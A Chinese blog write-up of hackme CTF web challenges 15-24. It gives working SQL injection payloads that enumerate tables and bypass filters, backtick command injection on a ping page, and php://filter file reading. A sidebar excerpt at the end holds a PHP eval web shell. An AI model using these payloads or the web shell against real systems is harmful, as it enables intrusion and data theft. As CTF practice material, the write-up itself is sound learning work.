hackme web题 15 - 24

最新推荐文章于 2024-05-05 22:16:51 发布
最新推荐文章于 2024-05-05 22:16:51 发布
阅读量277 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44843084/article/details/106244474
版权

hackme web题 15 - 24

15 hide and seek

点开的网址的源代码205行

16 guestbook

这题太卡了太卡了

点开message list的链接可以得到具体的信息
在这里插入图片描述

数字型注入
在这里插入图片描述

id=148 order by 4正常

id=148 order by 5错误,表有四列

后三列都会显示
在这里插入图片描述

-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4得到当前数据库中表名,有flag,posts,users

-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name="flag"),3,4得到列名id,flag,padding0,padding1

-1 union select 1,(select flag from flag),3,4显示错误,需要一个一个输出

-1 union select 1,(select flag from flag limit 1,1),3,4flag(第一条信息那个gif好鬼畜

17 LFI

Tips: LFI, php://filter

登陆页面提示
在这里插入图片描述

php://filter/read=convert.base64-encode/resource=查看源码的base64编码

pages/flag下:
在这里插入图片描述

访问config.php得到(直接访问page答案也一样

18 homepage

源码217行的cute.js

一堆颜表情,可以用浏览器控制台解码,得到二维码
在这里插入图片描述

扫描得到flag

19 Ping

黑名单
在这里插入图片描述

可以用反引号`ls -l`
在这里插入图片描述

有flag.php,但是cat在黑名单

sort:将文件排序输出

`sort ???`

得到flag

20 scoreboard

提示不需要浏览

在响应头
在这里插入图片描述

21 Login as Admin 0

可以查看源码

 <?php
require('config.php');

// table schema
// user -> id, user, password, is_admin

if($_GET['show_source'] === '1') {
    highlight_file(__FILE__);
    exit;
}

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
        strstr($strl, 'update') || strstr($strl, 'delete')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

$_POST = array_map(safe_filter, $_POST);

$user = null;

// connect to database

if(!empty($_POST['name']) && !empty($_POST['password'])) {
    $connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
        $_POST['name'],
        $_POST['password']
    );
    try {
        $query = $db->query($sql);
        if($query) {
            $user = $query->fetchObject();
        } else {
            $user = false;
        }
    } catch(Exception $e) {
        $user = false;
    }
}
?>

闭合为’,

or 1=1、 drop、update、delete被过滤,' ->\\'

or->||'->\'

1\' || 1=1#可以进入,提示不是admin,是guest

"SELECT * FROM `user` WHERE `user` = '1\' || 1=1"

是得到整个user表,但是只有整张表的第一个会被验证

试第二个

admin\' || 1=1 limit 1,1#

admin登陆成功,得到flag

22 Login as Admin 0.1

跟0一样的代码,0的最后提示了 flag2 in the database! ,应该要注入数据库

order by 好像不能用

直接试union select

1\' union select 1,2,3,4#成功登陆并且回显2

1\' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#得到当前数据库中表名,有一个h1dden_f14g

1\' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="h1dden_f14g"),3,4#得到列名the_f14g

1\' union select 1,(select the_f14g from h1dden_f14g),3,4#得到flag

23 Login as Admin 1

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

空格、1=1、"被过滤,' ->\\'

1\'/**/or/**/1#能登陆,但是没flag,用户名直接显示了输入,应该和21一样是guest

1\'/**/or/**/1/**/limit/**/1,1#得到flag

24 Login as Admin 1.2

同样提示了提示了 flag2 in the database!

用户名直接是post的值

bool盲注。之后弄

霜桃
关注
“百度杯” CTF比赛 九月场 Web-Login
qq_34106499的博客
01-17 759
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
hackme web wp(全)
zhwho的博客
04-07 1396
HackmeCTF—WP WEB 1.hide and seek 根据目意思猜测网页源代码里可能会有 提示,右键查看网页源代码,发现flag 2.guestbook 看到no data,点击new post可以插入新的数据,然后再回到message list可以看到刚才插入的数据,点进去阅读,看到可疑的URL:?mod=read&id=152如图2.1 图2.1 尝试SQL注入 首先...
Hackme有趣的web
蚁景网安学院
11-20 929
之前断断续续的做过 http://hackme.inndy.tw/上面的一些目有些还是很有趣的,记录一下。ping<?php $blacklist = [ ...
Hackme CTF】Web--scoreboard
VZZmieshenquan的博客
04-21 588
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
Hackme CTF】Web--hide and seek
VZZmieshenquan的博客
04-21 673
Description: Can you see me? I’m so close to you but you can’t see me. Solution: 点开网址 https://hackme.inndy.tw/ 查看页面源代码,拉到最底端看到flag Flag: FLAG{0h U C meeeeeeeeeeeeeeeeeeee!} ...
hackmeweb部分水writeup集合
cggwz的信息飞船
10-31 521
简单介绍,hackme是提供ctf基础的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
hackmeweb wp)
Xi4or0uji
09-06 4456
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
web记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
Webhacking.kr writeup(更新至challenge 29)
Bendawang's Blog
04-14 4787
Webhacking.kr writeup
2024年最全对CTF很感兴趣,应该如何入手?,2024年最新2024最新网络安全面试及答案
2401_84545088的博客
05-05 1054
加入一个氛围较好的社群,有讨论才有进步跟老司机一起打比赛,增进感(ji)情(qing)也增加技术找到一个好的系统的学习资料正好,今天,由国内老牌CTF战队FlappyPig撰写的新书《CTF特训营:技术详解、解方法与竞赛技巧》上线京东预售了,据我所知这应该是国内第一本以CTF知识为主的图书。
SQL注入---Post注入----Rank1---2
weixin_46735316的博客
04-13 382
4.2.1-SQL注入-POST注入Rank 1 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常。在输入框输入’,页面正常,证明’闭合有效 2.猜解字段数 order by 查询字段数 得出字段数为3 3.union联合查询输出点 4.查询当前数据库名 ’ union select 1,2,database()# 得出数据库名为post_error 5.查询post_...
Ten tips for building better Adobe AIR applications
xiaoxin888888的专栏
11-18 1616
<br />Now that we have launched AIR 2, I figured it would be a good time to look back at all the AIR code I've written over the last few months and pick out some of the best snippets and concepts to share with the community. This article describes ten tech
简单的sql注入之2WP
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
记一道的三种注入姿势
Atkx's Blog
11-16 576
ctfshow-web2 提示: 最简单的SQL注入 手工注入 用万能密码1' or 1=1#,登陆成功 判断字段数,select 1,2,3有回显,select 1,2,3,4时无回显,说明字段为3 1' or 1=1 union select 1,2,3 # 爆数据库,当前数据库为web2 1' or 1=1 union select 1,database(),3 # 爆表名,有一个flag表 1' or 1=1 union select 1,group_concat(table_name)
实验吧-简单的登录——WriteUp再研究
LeeHDsniper的博客
07-17 6281
前言 这个目的难点就是在于对于CBC加密方式尤其是解密这部分要琢磨一番,让我想起当年大学的时候信安三勇中的两勇的课,一门密码学,一门数学基础,可怕之极。这个网上writeup一大堆,但是在一些方面解释的不是很详细,对大神们已经说的很清楚的地方我就粗略带过。 CBC解密以及字节翻转攻击(cbc-byte-flipping-attack) 我主要以CBC字符翻转 原理与实战这篇文章为基础...
Hackme-Web-wp
qq_41509200的博客
09-13 2291
Hackme-Web-wp 背景: 这几天老师要求我们把hackme目做出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 目及解思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 目描述说离我很近,于是便翻翻网页源代码,果真发现了flag FLAG{0h U...
MySQL中间件之ProxySQL(11):链式规则( flagINflagOUT )
weixin_34319817的博客
07-22 182
返回ProxySQL系列文章:http://www.cnblogs.com/f-ck-need-u/p/7586194.html   1.理解链式规则 在mysql_query_rules表中,有两个特殊字段"flagIN"和"flagOUT",它们分别用来定义规则的入口和出口,从而实现链式规则(chains of rules)。 链式规则的实现方式如下: 当入口值flagIN设置为0时,表示...
从数据库取数据的优化与flag登陆登出
VON
01-06 974
登录和未登录界面显示的解决,可以说是想办法解决了,但随之而来需要更改的其他大模块也要修改,例如从相关 资讯返回到首页时。是要给每个大的模块界面都来判断是否登录或者登出。 拿正姐做好的在线学习界面进行合并。基于现在可以考虑的对从数据库取数据的效率问进行了尝试。 新的尝试也导致了新的bug:推荐资讯数据插入的顺序问。 顺序问,从一般的数据库取数据时是可以设置用什么排序
hackme靶机通关
最新发布
12-27
### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表,这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行 某些情况下,Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施,则可能会被用来上载恶意脚本文件(如PHP木马)。一旦成功上传了一句话木马到服务器端,就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口,它会响应来自客户端提交的数据包中携带的指令参数(`cmd`),从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径,通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别 当获得了初步的访问权限之后,下一步便是寻找能够帮助提权的信息或配置错误之处。例如,可以通过查找管理员账户凭证或者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令,进而完全掌控整个系统环境[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值